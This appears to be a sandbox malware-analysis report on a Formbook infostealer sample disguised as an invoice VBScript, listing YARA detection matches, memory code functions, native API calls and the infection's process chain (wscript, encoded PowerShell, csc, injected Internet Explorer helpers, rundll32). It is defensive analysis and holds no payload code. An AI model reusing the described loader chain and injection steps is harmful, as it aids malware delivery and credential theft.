Source: 00000016.00000000.3081887285.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000015.00000002.3509051693.000000001EB00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.3509051693.000000001EB00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.3509051693.000000001EB00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000017.00000002.6883034007.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.6883034007.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.6883034007.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000016.00000000.3203308089.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000000.3203308089.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000000.3203308089.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000017.00000002.6860784078.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.6860784078.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.6860784078.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000017.00000002.6865229521.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.6865229521.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.6865229521.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 1740, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: ielowutil.exe PID: 8008, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 7768, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0706EAF0 4_2_0706EAF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07ED3628 4_2_07ED3628
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07ED360D 4_2_07ED360D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08560040 4_2_08560040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08560006 4_2_08560006
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE92EE8 21_2_1EE92EE8
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF59ED2 21_2_1EF59ED2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA1EB2 21_2_1EEA1EB2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF50EAD 21_2_1EF50EAD
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF40E6D 21_2_1EF40E6D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEE2E48 21_2_1EEE2E48
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEC0E50 21_2_1EEC0E50
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA6FE0 21_2_1EEA6FE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF51FC6 21_2_1EF51FC6
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5EFBF 21_2_1EF5EFBF
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5FF63 21_2_1EF5FF63
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEACF00 21_2_1EEACF00
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBFCE0 21_2_1EEBFCE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF27CE8 21_2_1EF27CE8
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF6ACEB 21_2_1EF6ACEB
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEB8CDF 21_2_1EEB8CDF
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF39C98 21_2_1EF39C98
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA3C60 21_2_1EEA3C60
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5EC60 21_2_1EF5EC60
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF56C69 21_2_1EF56C69
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF4EC4C 21_2_1EF4EC4C
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEAAC20 21_2_1EEAAC20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE90C12 21_2_1EE90C12
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF3FDF4 21_2_1EF3FDF4
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA9DD0 21_2_1EEA9DD0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEB2DB0 21_2_1EEB2DB0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA0D69 21_2_1EEA0D69
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF57D4C 21_2_1EF57D4C
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5FD27 21_2_1EF5FD27
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE9AD00 21_2_1EE9AD00
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBFAA0 21_2_1EEBFAA0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5FA89 21_2_1EF5FA89
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5EA5B 21_2_1EF5EA5B
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5CA13 21_2_1EF5CA13
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF14BC0 21_2_1EF14BC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5FB2E 21_2_1EF5FB2E
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEDDB19 21_2_1EEDDB19
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA0B10 21_2_1EEA0B10
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF578F3 21_2_1EF578F3
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA28C0 21_2_1EEA28C0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF518DA 21_2_1EF518DA
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF198B2 21_2_1EF198B2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEB6882 21_2_1EEB6882
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE86868 21_2_1EE86868
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF15870 21_2_1EF15870
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5F872 21_2_1EF5F872
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA9870 21_2_1EEA9870
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBB870 21_2_1EEBB870
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF40835 21_2_1EF40835
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA3800 21_2_1EEA3800
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EECE810 21_2_1EECE810
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEE59C0 21_2_1EEE59C0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE9E9A0 21_2_1EE9E9A0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5E9A6 21_2_1EF5E9A6
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5F6F6 21_2_1EF5F6F6
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE9C6E0 21_2_1EE9C6E0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF136EC 21_2_1EF136EC
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5A6C0 21_2_1EF5A6C0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA0680 21_2_1EEA0680
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEC4670 21_2_1EEC4670
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF4D646 21_2_1EF4D646
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF3D62C 21_2_1EF3D62C
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBC600 21_2_1EEBC600
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA2760 21_2_1EEA2760
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEAA760 21_2_1EEAA760
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF56757 21_2_1EF56757
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0D480 21_2_1EF0D480
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA0445 21_2_1EEA0445
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF575C6 21_2_1EF575C6
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5F5C9 21_2_1EF5F5C9
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF6A526 21_2_1EF6A526
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8D2EC 21_2_1EE8D2EC
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5124C 21_2_1EF5124C
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE91380 21_2_1EE91380
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5F330 21_2_1EF5F330
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEAE310 21_2_1EEAE310
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF570F1 21_2_1EF570F1
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEAB0D0 21_2_1EEAB0D0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE900A0 21_2_1EE900A0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED508C 21_2_1EED508C
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF4E076 21_2_1EF4E076
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBB1E0 21_2_1EEBB1E0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA51C0 21_2_1EEA51C0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEE717A 21_2_1EEE717A
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF3D130 21_2_1EF3D130
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF6010E 21_2_1EF6010E
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8F113 21_2_1EE8F113
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_02EBDEAE 21_2_02EBDEAE
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: String function: 1EF0E692 appears 86 times
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: String function: 1EF1EF10 appears 105 times
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: String function: 1EEE7BE4 appears 96 times
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: String function: 1EE8B910 appears 268 times
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: String function: 1EED5050 appears 36 times
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2ED0 NtResumeThread,LdrInitializeThunk, 21_2_1EED2ED0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2E50 NtCreateSection,LdrInitializeThunk, 21_2_1EED2E50
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2F00 NtCreateFile,LdrInitializeThunk, 21_2_1EED2F00
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2CF0 NtDelayExecution,LdrInitializeThunk, 21_2_1EED2CF0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2C50 NtUnmapViewOfSection,LdrInitializeThunk, 21_2_1EED2C50
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2C30 NtMapViewOfSection,LdrInitializeThunk, 21_2_1EED2C30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, 21_2_1EED2DC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2D10 NtQuerySystemInformation,LdrInitializeThunk, 21_2_1EED2D10
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2A80 NtClose,LdrInitializeThunk, 21_2_1EED2A80
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2BC0 NtQueryInformationToken,LdrInitializeThunk, 21_2_1EED2BC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2B90 NtFreeVirtualMemory,LdrInitializeThunk, 21_2_1EED2B90
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED29F0 NtReadFile,LdrInitializeThunk, 21_2_1EED29F0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED34E0 NtCreateMutant,LdrInitializeThunk, 21_2_1EED34E0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2EC0 NtQuerySection, 21_2_1EED2EC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2EB0 NtProtectVirtualMemory, 21_2_1EED2EB0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2E80 NtCreateProcessEx, 21_2_1EED2E80
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2E00 NtQueueApcThread, 21_2_1EED2E00
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2FB0 NtSetValueKey, 21_2_1EED2FB0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2F30 NtOpenDirectoryObject, 21_2_1EED2F30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2CD0 NtEnumerateKey, 21_2_1EED2CD0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED3C90 NtOpenThread, 21_2_1EED3C90
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2C20 NtSetInformationFile, 21_2_1EED2C20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED3C30 NtOpenProcessToken, 21_2_1EED3C30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2C10 NtOpenProcess, 21_2_1EED2C10
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2DA0 NtReadVirtualMemory, 21_2_1EED2DA0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2D50 NtWriteVirtualMemory, 21_2_1EED2D50
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2AC0 NtEnumerateValueKey, 21_2_1EED2AC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2AA0 NtQueryInformationFile, 21_2_1EED2AA0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2A10 NtWriteFile, 21_2_1EED2A10
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2BE0 NtQueryVirtualMemory, 21_2_1EED2BE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2B80 NtCreateKey, 21_2_1EED2B80
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2B20 NtQueryInformationProcess, 21_2_1EED2B20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2B00 NtQueryValueKey, 21_2_1EED2B00
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2B10 NtAllocateVirtualMemory, 21_2_1EED2B10
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED38D0 NtGetContextThread, 21_2_1EED38D0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED29D0 NtWaitForSingleObject, 21_2_1EED29D0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED4570 NtSuspendThread, 21_2_1EED4570
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED4260 NtSetContextThread, 21_2_1EED4260
Source: Unclear Proforma Invoice.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: edgegdi.dll
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Section loaded: edgegdi.dll
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Section loaded: edgegdi.dll
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Section loaded: edgegdi.dll
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Unclear Proforma Invoice.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmhd51lu\tmhd51lu.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBA75.tmp" "c:\Users\user\AppData\Local\Temp\tmhd51lu\CSCDE243CA280D4B5C9E282790C554DB9.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Program Files (x86)\internet explorer\ielowutil.exe
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
